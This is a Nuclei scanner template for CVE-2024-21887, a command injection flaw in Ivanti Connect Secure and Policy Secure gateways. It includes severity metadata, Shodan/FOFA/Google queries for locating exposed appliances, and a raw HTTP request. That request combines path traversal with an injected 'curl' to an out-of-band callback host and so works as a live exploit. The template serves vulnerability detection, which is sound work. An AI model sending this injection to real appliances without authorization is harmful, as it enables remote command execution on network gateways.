id: CVE-2024-21887

info:
  name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection
  author: pdresearch,parthmalhotra,iamnoooob
  severity: critical
  description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/farukokutan/Threat-Intelligence-Research-Reports
    - https://github.com/lions2012/Penetration_Testing_POC
    - https://github.com/Chocapikk/CVE-2024-21887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-21887
    cwe-id: CWE-77
    epss-score: 0.97334
    epss-percentile: 0.99886
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ivanti
    product: connect_secure
    shodan-query:
      - "html:\"welcome.cgi?p=logo\""
      - http.title:"ivanti connect secure"
      - http.html:"welcome.cgi?p=logo"
    fofa-query:
      - body="welcome.cgi?p=logo"
      - title="ivanti connect secure"
    google-query: intitle:"ivanti connect secure"
  tags: packetstorm,cve,cve2024,kev,rce,ivanti

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'application/json'

      - type: word
        part: body
        words:
          - '"result":'
          - '"message":'
        condition: and
# digest: 4a0a0047304502203589440c84513b0f0c1875e09acffb10daecff9b623ee109bc5457ffa0e5e6c4022100a6ce341b46f5eb47bff2eac39e50912943c63bf39f263790afc5c862480d10a5:922c64590222798bb761d5b6d8e72950